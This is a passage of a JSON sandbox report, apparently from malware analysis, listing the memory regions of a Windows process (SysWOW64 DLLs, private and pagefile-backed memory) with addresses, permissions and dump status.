"region", "version": 1 }, "end_va": 1954877439, "entry_point": 1954715788, "filename": "\\Windows\\SysWOW64\\winspool.drv", "id": "region_1394", "name": "winspool.drv", "norm_filename": "c:\\windows\\syswow64\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:00:41.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1954938880, "type": "region", "version": 1 }, "end_va": 1955143679, "entry_point": 1954953201, "filename": "\\Windows\\SysWOW64\\winmm.dll", "id": "region_1395", "name": "winmm.dll", "norm_filename": "c:\\windows\\syswow64\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1954938880, "timestamp": "00:00:41.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1955201024, "type": "region", "version": 1 }, "end_va": 1955282943, "entry_point": 1955205952, "filename": "\\Windows\\SysWOW64\\msacm32.dll", "id": "region_1396", "name": "msacm32.dll", "norm_filename": "c:\\windows\\syswow64\\msacm32.dll", "region_type": "memory_mapped_file", "start_va": 1955201024, "timestamp": "00:00:41.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960579297, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1397", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:00:41.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960747955, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1398", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:00:41.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961445749, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1399", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:00:41.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963891622, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1400", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:00:41.434", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964270403, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1401", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:00:41.434", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965388920, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1402", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:00:41.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965728882, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1403", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:00:41.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967766077, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1404", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:00:41.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1969110999, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1405", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:41.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970227685, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1406", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:00:41.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970812576, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1407", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:00:41.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970976493, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1408", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:00:41.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973433043, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1409", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:00:41.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991639040, "type": "region", "version": 1 }, "end_va": 1992224767, "entry_point": 1991655345, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1410", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991639040, "timestamp": "00:00:41.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993934185, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1411", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:00:41.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1412", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:00:41.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1413", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:00:41.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1414", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:41.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1415", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:41.442", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 7897087, "entry_point": 0, "filename": null, "id": "region_1416", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:00:41.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961104783, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1417", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:00:41.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974474379, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1418", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:00:41.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1419", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:41.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1420", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:41.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 5898239, "entry_point": 0, "filename": null, "id": "region_1421", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:00:41.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7929856, "type": "region", "version": 1 }, "end_va": 9506815, "entry_point": 0, "filename": null, "id": "region_1422", "name": "pagefile_0x0000000000790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7929856, "timestamp": "00:00:41.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1423", "name": "pagefile_0x0000000000c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12582912, "timestamp": "00:00:41.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 36499455, "entry_point": 33554432, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1424", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:00:41.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1952776192, "type": "region", "version": 1 }, "end_va": 1953300479, "entry_point": 1952856009, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1425", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1952776192, "timestamp": "00:00:41.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 9568256, "type": "region", "version": 1 }, "end_va": 11665407, "entry_point": 0, "filename": null, "id": "region_1426", "name": "private_0x0000000000920000", "norm_filename": null, "region_type": "private_memory", "start_va": 9568256, "timestamp": "00:00:41.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 5763071, "entry_point": 0, "filename": null, "id": "region_1427", "name": "pagefile_0x00000000004a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4849664, "timestamp": "00:00:41.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 532479, "entry_point": 0, "filename": null, "id": "region_1428", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:00:41.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 647167, "entry_point": 0, "filename": null, "id": "region_1429", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:00:41.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4001792, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 40505343, "entry_point": 0, "filename": null, "id": "region_1430", "name": "private_0x00000000022d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36503552, "timestamp": "00:00:41.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 57344, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 712703, "entry_point": 0, "filename": null, "id": "region_1431", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:00:41.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 786431, "entry_point": 0, "filename": null, "id": "region_1432", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:00:41.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 9568256, "type": "region", "version": 1 }, "end_va": 10616831, "entry_point": 0, "filename": null, "id": "region_1433", "name": "private_0x0000000000920000", "norm_filename": null, "region_type": "private_memory", "start_va": 9568256, "timestamp": "00:00:41.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11403264, "type": "region", "version": 1 }, "end_va": 11665407, "entry_point": 0, "filename": null, "id": "region_1434", "name": "private_0x0000000000ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11403264, "timestamp": "00:00:41.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1975844864, "type": "region", "version": 1 }, "end_va": 1988730879, "entry_point": 1976374785, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1435", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1975844864, "timestamp": "00:00:42.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1963769855, "entry_point": 1963729806, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_1436", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:00:42.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1973342207, "entry_point": 1972180362, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_1437", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:00:42.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1961623552, "type": "region", "version": 1 }, "end_va": 1963700223, "entry_point": 1961632473, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_1438", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1961623552, "timestamp": "00:00:42.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1967411199, "entry_point": 1966413925, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_1439", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:00:42.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1992556544, "type": "region", "version": 1 }, "end_va": 1993826303, "entry_point": 1992563509, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_1440", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1992556544, "timestamp": "00:00:42.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1958281216, "type": "region", "version": 1 }, "end_va": 1958375423, "entry_point": 1958288541, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_1441", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1958281216, "timestamp": "00:00:42.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1958477824, "type": "region", "version": 1 }, "end_va": 1958522879, "entry_point": 1958484370, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_1442", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1958477824, "timestamp": "00:00:42.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1958412288, "type": "region", "version": 1 }, "end_va": 1958465535, "entry_point": 1958416864, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_1443", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1958412288, "timestamp": "00:00:42.787", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_1444", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:42.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36962304, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_1445", "name": "private_0x0000000002340000", "norm_filename": null, "region_type": "private_memory", "start_va": 36962304, "timestamp": "00:00:42.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 37355520, "type": "region", "version": 1 }, "end_va": 38404095, "entry_point": 0, "filename": null, "id": "region_1446", "name": "private_0x00000000023a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37355520, "timestamp": "00:00:42.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1447", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:42.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12058624, "type": "region", "version": 1 }, "end_va": 12320767, "entry_point": 0, "filename": null, "id": "region_1448", "name": "private_0x0000000000b80000", "norm_filename": null, "region_type": "private_memory", "start_va": 12058624, "timestamp": "00:00:49.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36569088, "type": "region", "version": 1 }, "end_va": 36831231, "entry_point": 0, "filename": null, "id": "region_1449", "name": "private_0x00000000022e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36569088, "timestamp": "00:00:49.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 40108032, "type": "region", "version": 1 }, "end_va": 41156607, "entry_point": 0, "filename": null, "id": "region_1450", "name": "private_0x0000000002640000", "norm_filename": null, "region_type": "private_memory", "start_va": 40108032, "timestamp": "00:00:49.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 42008576, "type": "region", "version": 1 }, "end_va": 43057151, "entry_point": 0, "filename": null, "id": "region_1451", "name": "private_0x0000000002810000", "norm_filename": null, "region_type": "private_memory", "start_va": 42008576, "timestamp": "00:00:49.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958161859, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1452", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:49.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_1453", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:00:49.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_1454", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:00:49.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], 